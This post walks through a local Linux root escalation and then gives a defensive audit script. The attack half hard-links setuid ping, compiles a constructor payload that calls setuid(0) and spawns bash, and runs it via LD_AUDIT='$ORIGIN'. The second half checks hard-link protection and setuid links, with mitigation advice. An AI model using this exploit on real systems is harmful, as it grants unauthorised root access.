Escalating a regular Linux user to root

The regular user boy is used as the test account.

[boy@localhost ~]$ mkdir /tmp/exploit
[boy@localhost ~]$ ln /bin/ping /tmp/exploit/target # hard-link the setuid ping binary
[boy@localhost ~]$ exec 3< /tmp/exploit/target # open the link on file descriptor 3 of the current shell
[boy@localhost ~]$ ls -l /proc/$$/fd/3
lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
[boy@localhost ~]$ rm -rf /tmp/exploit/
[boy@localhost ~]$ ls -l /proc/$$/fd/3
[boy@localhost ~]$ vim payload.c
/* contents of payload.c */
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

void __attribute__((constructor)) init(void)
{
    setuid(0);
    system("/bin/bash");
}


[boy@localhost ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[boy@localhost ~]$ ls -l /tmp/exploit
[boy@localhost ~]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
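
The session above starts by hard-linking a setuid binary into a directory the user controls, which only works when that directory is on the same filesystem as the binary and the kernel permits the link. The audit script below is an added example, not part of the original post; it checks those preconditions on a host. The function names are hypothetical, and it assumes `find` and `stat -c` as shipped in GNU coreutils or BusyBox.

```shell
#!/bin/sh
# Added audit example (not from the original post).
# Assumes GNU/BusyBox find and stat; all function names are hypothetical.

# Return 0 if the kernel refuses hard links to files the caller does not own
# (sysctl fs.protected_hardlinks = 1).
# $1: file to read; the parameter exists so the check can be tested.
hardlinks_protected() {
    f=${1:-/proc/sys/fs/protected_hardlinks}
    [ -r "$f" ] && [ "$(cat "$f")" = "1" ]
}

# Return 0 if both paths live on the same filesystem (same device number).
# Hard links cannot cross filesystems, so a user-writable directory that
# shares a filesystem with setuid binaries is what makes the `ln` step possible.
same_filesystem() {
    [ "$(stat -c %d "$1")" = "$(stat -c %d "$2")" ]
}

# Print setuid regular files under $1 that have more than one name.
# An unexpected extra link to a setuid binary is worth investigating.
multilinked_setuid() {
    find "$1" -xdev -type f -perm -4000 -links +1 2>/dev/null
}

# Report for a real host, e.g.: audit_host /bin /tmp
audit_host() {
    bindir=$1
    userdir=$2
    hardlinks_protected || echo "WARN: fs.protected_hardlinks is not 1"
    same_filesystem "$bindir" "$userdir" &&
        echo "WARN: $userdir shares a filesystem with $bindir"
    multilinked_setuid "$bindir" | sed 's/^/WARN: extra hard link: /'
    return 0
}
```

Putting `/tmp` and other user-writable directories on their own filesystem mounted `nosuid`, and keeping `fs.protected_hardlinks` at 1, removes the hard-link step this session relies on.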

